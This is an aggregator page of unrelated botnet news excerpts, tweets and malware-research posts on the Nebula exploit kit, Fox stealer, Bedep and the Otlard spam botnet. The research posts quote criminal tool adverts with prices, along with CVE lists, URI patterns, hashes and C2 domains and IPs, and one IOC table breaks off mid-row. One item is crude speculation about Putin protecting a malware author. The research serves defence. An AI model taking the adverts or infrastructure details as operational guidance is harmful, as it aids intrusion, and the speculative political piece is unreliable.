Chú ý: Chỉ trừ 1 số tài liệu đặc biệt và quý chúng tôi thu phí để duy trì Website ( Trả phí Account lưu trữ,VPS....) .Còn lại 99% CHÚNG TÔI CHIA SẺ MIỄN PHÍ.Các bạn nên trân trọng điều đó để đảm bảo tính chia sẻ dài lâu.

          â€˜Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge        
The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, and rented out to an elite cadre of hackers for use in online extortion attacks, spam and other illicit moneymaking schemes.
          Researchers Clobber Khelios Spam Botnet        
Experts from across the security industry collaborated this week to quarantine more than 110,000 Microsoft Windows PCs that were infected with the Khelios worm, a contagion that forces infected PCs to blast out junk email advertising rogue Internet pharmacies. Most botnets are relatively fragile: If security experts or law enforcement agencies seize the Internet servers used to control the zombie network, the crime machine eventually implodes. But Khelios (a.k.a. "Kelihos") was built to withstand such attacks, employing a peer-to-peer structure not unlike that used by popular music and file-sharing sites to avoid takedown by the music and entertainment industry.
           RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW        
2012-09-14 04:41:37 - irongeek_adc : RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW
           RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW        
2012-09-14 03:38:07 - oncee : RT @isdpodcast: Podcast: Episode 759 - Nitol Botnet,Google 163 iTunes Holes, Pressing 'On', 'Great Escape' http://tco/s1FKcZGW
           RT @DennisF New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/sURvE4vi        
2012-07-21 01:20:18 - ryanaraine : RT @DennisF New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/sURvE4vi
           New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/P9Mk3j0j        
2012-07-20 22:08:01 - DennisF : New podcast with @jnazario on botnet takedowns and whether we can ever win Really enjoyed this one https://tco/P9Mk3j0j
           I had fun on the RiskyBiz podcast speaking about Botnets Nessus virus auditing : http://tco/39FuIoeV        
2012-07-17 11:50:44 - RonGula : I had fun on the RiskyBiz podcast speaking about Botnets Nessus virus auditing : http://tco/39FuIoeV
           RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco         
2012-04-12 17:07:21 - nicolasbrulez : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
           RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1V         
2012-04-11 20:36:22 - craiu : RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1V
           In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1VeIle        
2012-04-11 08:28:27 - threatpost : In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the Flashback #Mac botnet, http://tco/4n1VeIle
           RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco         
2012-04-11 06:26:05 - ericfreyss : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
           RT @threatpost In this podcast, @DennisF talks with @ryanaraine and @craiu about the Flashback #Mac botnet http://tco/IFGYIDru        
2012-04-11 00:37:43 - ryanaraine : RT @threatpost In this podcast, @DennisF talks with @ryanaraine and @craiu about the Flashback #Mac botnet http://tco/IFGYIDru
           RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco         
2012-04-11 00:37:43 - ryanaraine : RT @sawaba: Good podcast including one of the guys, @ryanaraine , that brought DrWeb's Mac botnet discovery to my attention http://tco
           RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the #Flashback botnet, http://tco/5pwJbfIh        
2012-04-10 22:53:46 - DennisF : RT @threatpost: In this @Threapost podcast, @DennisF talks with @Ryanaraine and @CRaiu about the #Flashback botnet, http://tco/5pwJbfIh
           March Security Minute video podcast talks Kelihos botnet, CanSecWest hacker payouts, Ke$ha hack and Tax Day scams http://tco/AFS6euiL        
2012-03-15 21:27:28 - Fortinet : March Security Minute video podcast talks Kelihos botnet, CanSecWest hacker payouts, Ke$ha hack and Tax Day scams http://tco/AFS6euiL
           In case you missed it: Deep-dive podcast with Paul Ferguson of @trendmicro on the DNS Changer botnet takedown http://tco/jXGt6foU        
2011-11-16 16:04:52 - SearchSecurity : In case you missed it: Deep-dive podcast with Paul Ferguson of @trendmicro on the DNS Changer botnet takedown http://tco/jXGt6foU
           Fortinet Security Minute video podcast discusses latest threats by “Anonymous,” Waledac botnet and new Android malware http://tco/BmUeQzP7        
2011-10-01 02:48:41 - Fortinet : Fortinet Security Minute video podcast discusses latest threats by “Anonymous,” Waledac botnet and new Android malware http://tco/BmUeQzP7
           podcast: @DennisF talks with Tillmann Werner about the takedown of the Kelihos botnet and ethical/legal peculiarities http://tco/JT0g0PaI        
2011-09-30 04:14:39 - ryanaraine : podcast: @DennisF talks with Tillmann Werner about the takedown of the Kelihos botnet and ethical/legal peculiarities http://tco/JT0g0PaI
          Tsar Putin protects Zeus        
Tsar Putin protects Zeus


Pagan gods put faith in Russian Orthodox 

It seems that Russian Tsar Putin swings both ways – on one hand he is a rabid gay-hating Russian Orthodox on the other he is protecting a bloke who made Zeus a household name.

Researchers have linked one of the world's most-used banking malware attack tools to an espionage campaign that may be tied to the Russian government.

Game over Zeus is a financially focused malware designed to steal valuable information from machines, such as bank account numbers, passwords, personal identification numbers, and online banking account login details.

It was one of the most successful botnet attack tools used by cyber criminals and is believed to have enslaved between 500,000 to a million computers at its peak.

However it became clear that GOZ also had a spying function and specific botnets where being used for espionage which seemed to fit in the goals of Tsar Putin.

After the recent political changes in Ukraine, which led to a more pro-western government, one botnet which had been previously used for banking fraud switched to search for certain types of politically sensitive information," read the paper

The FBI believes GOZ was created by Evgeniy "Slavik" Bogachev and is currently offering a $4.2 million bounty for information that may lead to his arrest.

However no one can find him and the sane money is on the fact that he is being protected in a manly way by Tsar Putin.

This means that the chances of anyone getting their paws on him, other than Tsar Putin of course, is if they snatch him out of the country in a diplomatic bag.


          Bye Empire, Hello Nebula Exploit Kit.        
Nebula Logo




While Empire (RIG-E) disappeared at the end of December after 4 months of activity

Illustration of  the last month of witnessed Activity for Empire
on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.

------
Selling EK Nebula
------
Nebula Exploit kit

Features:
-Automatic domain scanning and generating (99% FUD)
-API rotator domains
-Exploit rate tested in different traffic go up 8/19%
-knock rate tested whit popular botnet go 30/70%
-Clean and modern user interface
-Custom domains & server ( add & point your own domains coming soon...)
-Unlimited flows & files
-Scan file & domains
-Multiple payload file types supported (exe , dll , js, vbs)
-Multi. geo flow (split loads by country & file)
-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting
-Public stats by file & flow
-latest CVE-2016 CVE-2017
-custom features just ask support

Subscriptions:
24h - 100$
7d - 600$
31d - 2000$

Jabber - nebula-support@xmpp.jp


Offering free tests to trusted users 
------

In same thread some screenshots were shared by a customer.







Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown.

"GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17
Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) 

This Sundown variation was not so much different from the mainstream one.
No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.

Digging more it appeared it was featuring an Internal TDS (as Empire). 
The same exact call would give you a different payload in France or in United Kingdom/Japan.
"GamiNook" traffic with geo in France - 2017-02-17
Identicall payload call gives you Gootkit instead of Pitou
Payload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)
Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.


At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).

So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.

The following days i saw other actor sending traffic to this EK.
Taxonomy tied to Nebula Activity in MISP - 2017-03-02
Taxonomy tied to GamiNook traffic activity, EK and resulting payload

Today URI pattern changed from this morning :

/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM
/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB
/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM
/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN
/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA
/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf
/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB
/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM
/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf
/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM
/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM
/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN

(which is Sundown/Beps without the index.php) to

/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8
/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU
/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4
/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT
/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1
/2003/01/27/exchange-monday-wilderness
/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c
/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7
/2006/08/05/fur-copper-shark
/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7
/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h
/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi
/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1
/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14
/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18
/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361
/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20
/2012/04/22/present-measure-physical-examination



(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )


2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02

This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.

Exploits:
CVE-2014-6332 + CVE-2015-0016
CVE-2013-2551
CVE-2016-0189 godmode
CVE-2015-8651
CVE-2015-7645
CVE-2016-4117

Files:  Nebula_2017-03-02 (2 fiddler - password is malware)

Acknowledgement :
Thanks Joseph C Chen and Brooks Li (Trendmicro),  Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.

Edit:
2017-03-03 Corrected some CVE id + not all payload are in clear
---
Some IOCs

DateSha256Comment
2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)
2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)
2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)
2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)
2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou
2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit
2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit
2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFox


DateDomainIPComment
2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain
2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain
2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain
2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain
2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain
2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula
2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula
2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula
2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula
2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula
2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula
2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula
2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula
2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula
2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula
2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula
2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula
2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula
2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula
2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula
2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula
2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula
2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula
2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula
2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula
2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula
2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula
2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula
2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula
2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula
2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula
2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula
2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula
2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula
2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula
2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula
2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula
2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula
2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula
2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula
2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula
2017/02/25penaltyinternet.asiadeliveryarmenian.pro
Gift for SweetTail-Fox-mlp
 by Mad-N-Monstrous


Small data drop about another Pony fork : Fox stealer.
First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.

Advert :
2016-08-11 - Sold underground by a user going with nickname "Cronbot"

--------
Стилер паролей и нетолько - Fox v1.0

Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.

О продукте : 
1. Умеет все что умеет пони. + добавлен новый софт.
2. Актуален на 2016 год.
3. Написан на С++ без дополнительных библиотек.
4. Админка от пони.

Условия : 
1. Только аренда.
2. Распространяется в виде EXE и DLL.
3. Исходники продавать не будем.

Аренда 250$ в месяц.
Исходники 2000$ разово.

----Translated by Jack Urban : ----

Password stealer and more - Fox v.1.0
We are releasing the product for general sale. Final stage of testing for this product is already underway.
About the product:
1. Is able to do everything that pony does. + new software has been added.
2. Relevant for 2016.
3. Written in C++ without additional libraries.
4. Admin from pony.
Conditions:
1. For rent only.
2. Distributed as an EXE and DLL.
3. We will not be selling the source.
Rent is $250 a month.
Originals are a 2000$ one time fee. 

--------

It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .

MISP taxonomy tags reflecting ScriptJS activity in the last months
(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )

2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13
Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2

Fox stealer (PonyForx) fingerprint in Cuckoo

Sample :
Associated C2:
blognetoo[.]com/find.php/hello
blognetoo[.]com/find.php/data
blognetoo[.]com|104.36.83.52
blognetoo[.]com|45.59.114.126
Caught by ET rule :
2821590 || ETPRO TROJAN Win32.Pony Variant Checkin

[1] ScriptJS's Pony :
master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS
​js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJS

Read More : 
http://pastebin.com/raw/uKLhTbLs few bits about ScriptJS

          Bedep has raised its game vs Bot Zombies        
Simulacra & Simulation - Jean Baudrillard
Featured in Matrix
Bedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It's intimate to Angler EK and appeared around August 2014

On the 2016-03-24 I noticed several move in Bedep. 

Angler infecting a VM and integrating it into an instance of Bedep botnet
2016-03-24
No more variable in the URI (as several month before), the protocol Key changed and in most of my manual checks, all threads were sending a strange payload in the first stream.

2ko size for Win7 64bits :
80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9a
Popup shown by the first payload from Bedep Stream - Win7
(in the background Angler Landing)

48ko size for WinXP 32bits:
a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780

Popup shown by the first payload from Bedep Stream - WinXP

Looking at my traffic I thought for some time that one of the Bedep instances was split in two.

Then I understood that I got different result on my "manually" driven VM (on VMWare ESXi) and my automated Cuckoo driven one ( on VirtualBox). I suspected it was related to hardening, as this is one of the main difference between those two systems.

And I got confirmation. Here is an example on a GooNky ([1] [2] [3]) malvertising traffic in Australia :

A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that i will refer as :
Bedep "Robot Town" - 2016-04-12
Now look what i get instead with a VM that is not spotted as is:
Same Angler thread - VM not detected. 1st Stream get Vawtrak
2016-04-12


I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them spotted by Cuckoo :

Bedep doing some ACPI checks
I think there are multiple level of checks. Some resulting in Bedep not trying to contact the C&C, some where the positive check end up with a different seed for the Bedep DGA redirecting spotted machines in a dedicated instance. 
This is quite powerful :
- the checks are made without dropping an executable. 
- if you don't know what to expect it's quite difficult to figure out that you have been trapped
- there is a lot of things that operators can do with this list of known bots and initial Bedep thread ID. 

One of them is for instance knowing which of the infection path are researcher/bots "highway" :

Illustration for Bedep "Robot Town" from an "infection path" focused point of view

This could be just a move to perform different tasks (AdFraud only (?) ) on VMs, but my guess it that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint Blog from 2016-03-18 which  show how Bedep threads are additional connectable dots. 

Sharing publicly is often a difficult decision. The question is which side will benefits the most from it, in the long time.

For researchers:
In the last 3 weeks, if your VM have communicated with :
95.211.205.228 (which is a Bedep ip from end of 2015 reused) || ( 85.25.41.95
 && http.uri.path  "ads.php?sid=1901" ) and you are interested by the "real payload" then you might want to give PAfish a run.

Sad little robot from "Robots" movie
On the other hand, any of your VM which has communicated with 104.193.252.245 (Bedep "standard" 18xx 19xx instance)  since the 24 of March is hardened enough to grab the real payload.

[Edits]
- Removed the AU focused mention on the Vawtrak. I have been told (Thanks ! ) it's US focused. Got geo 
Glitched. Maybe more about that a day or the other.
- Refine the check conditions for Researcher. IP  85.25.41.95 and sid=1901...otherwise...ok :)
[/Edits]

Acknowledgements :
Thanks Will Metcalf and Malc0de for the discussions and help on this topic
--
I'm sorry, but I must do it...Greetings to Angler and Bedep guys. ;) You are keeping us busy...and awake !

Reading :
Bedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - ArborSert



          Inside Jahoo (Otlard.A ?) - A spam Botnet        
Trash and Mailbox by Bethesda Softworks



Otlard.A (or let's say at least the malware triggering 2806902 || ETPRO TROJAN Win32.Otlard.A C&C Checkin response )  is a Spam Botnet

I saw it loaded as a plugin in an instance of Andromeda

That Andromeda is being spread via :


  • Bedep build id 6005 and here 6007 from an Angler EK fed by Malvertising :


VirtualDonna group redirecting traffic to an Angler instance loading Bedep buildid 6007 in memory
Bedep 6007 loading Andromeda 55ead0e4010c7c1a601511286f879e33 before update task.
2015-09-28


Note : Bedep 6007 was sometimes loading it with other payload
-2015-09-16 for : ec5d314fc392765d065ff16f21722008 with Trapwot (FakeAV) e600985d6797dec2f7388e86ae3e82ba and Pony a4f08c845cc8e2beae0d157a3624b686
-2015-09-29 for : 37898c10a350651add962831daa4fffa with Kovter ( 24143f110e7492c3d040b2ec0cdfa3d0 )

That Andromeda beaconing to dnswow .com enslaved >10k bots in a week :
Andromeda dnswow 2015-11-22

Andromeda dnswow 2015-11-27
Here the Otlard.A task in that Andromeda instance :
Task installing Otlard.A as a plugin to Andromeda

  • a Task in a Smokebot dropped by Nuclear Pack fed by Malvertising :
Malvertising > Nuclear Pack > Smokebot > Stealer, Ramnit, Htbot and Andromeda > Otlard.A
2015-11-28
Smokebot : cde587187622d5f23e50b1f5b6c86969
Andromeda : b75f4834770fe64da63e42b8c90c6fcd
(out of topic Ramnit : 28ceafaef592986e4914bfa3f4c7f5c0 - It's being massively spread those days in many infection path. (Edit 2015-12-29 :  Htbot.B :  d0a14abe51a61c727420765f72de843a named ProxyBack by PaloAlto)

Now here is what the control panel of that plugin looks like :

Otlard.A panel :


Otlard.A - JahooManager - Main - 2015-09-27
Otlard.A - JahooManager - Servers - 2015-09-27
Otlard.A - JahooManager - Settings - 2015-09-27
Otlard.A - JahooManager - Campaigns - 2015-09-27
Otlard.A - JahooManager - Bot - 2015-09-27
that exe is : 2387fb927e6d9d6c027b4ba23d8c3073 and appears to be Andromeda





Otlard.A - JahooSender - Tasks - 2015-09-27

Otlard.A - JahooSender - Tasks - 2015-11-28



Otlard.A - JahooSender - Tasks - Done Task - 2015-09-27
Otlard.A - JahooSender - Domains - 2015-09-27
Otlard.A - JahooSender - Domains - 2015-11-28

Otlard.A - JahooSender - Messages - 2015-09-27
Otlard.A - JahooSender - Messages - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28
Otlard.A - JahooSender - Headers - 2015-11-28
Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28
Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28
Otlard.A - JahooSender - Macross - 2015-11-28

Otlard.A - JahooSender - Macross - 2015-11-28


Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender  - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28
Otlard.A - JahooSender - Attach - 2015-11-28
Otlard.A - JahooSender - Attach - Attached image - 2015-11-28
Otlard.A - JahooSender - Rules - 2015-11-28
Otlard.A - JahooSender - Rules > Spam - 2015-11-28
Olard.A - JahooSender - Rules > User - 2015-11-28
Olard.A - Bases - Emails - 2015-11-28
Olard.A - Bases - Blacklist - 2015-11-28
Olard.A - Bases - Blacklist - Edit - 2015-11-28
Olard.A - Botnet - Main - 2015-09-27
Olard.A - Botnet - Main - 2015-11-28
Otlard.A - Botnet - Modules - 2015-11-28
Otlard.A - Botnet - Modules - Edit - 2015-11-28
Otlard.A - Incubator - Accounts - 2015-11-28
Otlard.A - Incubator - Settings - 2015-11-28
Note : registrator menu has disappeared in last version. 


--
Andromeda C&C 2015-11-28 :
5.8.35.241
202023 | 5.8.35.0/24 | LLHOST | EU | llhost-inc.com | LLHost Inc

Spam Module C&C 2015-11-28 :

5.8.32.10 
5.8.32.8
5.8.32.52
5.8.34.20
5.8.32.53
5.8.32.56
202023 | 5.8.32.0/24 | LLHOST | EU | zanufact.com | LLHost Inc

Thanks : Brett StoneGross for helping me with decoding/understanding the network communications

Files :
All samples which hashes have been discussed here are in that zip.
Jahoo - socker.dll : 7d14c9edfd71d2b76dd18e3681fec798
( If you want to look into this, i can provide associated network traffic)

Read More :

Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02
Inside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27
Inside Smoke Bot - Botnet Control Panel - 2012-04-28

Post publication Reading :
ProxyBack Malware Turns User Systems Into Proxies Without Consent - 2015-12-23 - JeffWhite - PaloAlto
          Network Security Today | @CloudExpo #Cloud #AI #SDN #Security #Analytics        
In its 2017 State of Malware Report, Malwarebytes Labs recorded a 267 percent increase in ransomware between January 2016 and November 2016, with over 400 different variants in total. The report noted that while malware authors mostly relied on ransomware to make the bulk of their revenues, there was an increase in ad fraud as well. Botnets and mobile malware also continue to expand and evolve. The report predicts that until IoT devices become secure out of the box, botnets will get even bigger and pose an even greater threat to the internet – and any company connected to it.

read more


          Using DNS as a C2 channel        
tl,dr; DNS C2 added to my Powershell botnet, Galvatron. One of my planned extensions to Galvatron was to add DNS command and control, using the very same database and bot commands.  This would provide yet another avenue to egress out the network.  And the best part?  The egress traffic is written into actual DNS request […]
           #OWASP SQL Injection and Other Flaws in VOlk-Botnet 4 0 Allow Victims to - Apparently, a remote attacker could http://tco/JXPsTdlO        
2012-10-10 14:25:30 - Netw0rkSecurity : #OWASP SQL Injection and Other Flaws in VOlk-Botnet 4 0 Allow Victims to - Apparently, a remote attacker could http://tco/JXPsTdlO
          Apple publishes support page for Flashback malware, is working on a fix        
Apple publishes support page for Flashback malware, is working on a fix
After the Flashback / Flashfake Mac trojan was exposed by Russian site Dr. Web, Apple has finally responded by publishing a support page about the issue and promising a fix. If you haven't heard by now, the malware exploits a flaw in the Java Virtual Machine, which Oracle pushed a fix for back in February, but Apple didn't patch until a botnet consisting of as many as 650,000 Macs was identified on March 4th. Antivirus maker Kaspersky has confirmed the earlier findings, and released a free tool affected users can run to remove the trojan from their computers. Other than the update already delivered for computers running OS 10.6 and 10.7 Apple recommends users on 10.5 and earlier disable Java in their browser preferences. What isn't mentioned however, is when its fix is incoming or any timetable on its efforts with international ISPs to cut off the IP addresses used by the network. This is not the first time Macs have fallen prey to malware and as their market share grows will likely not be the last, so don't think just opting for OS X is automatically keeping you a step ahead security-wise. Check the links below for more information about what the malware does, and how to get rid of it.
          Hackers grijpen terug naar oude technieken volgens tiende securityrapport van Cisco        
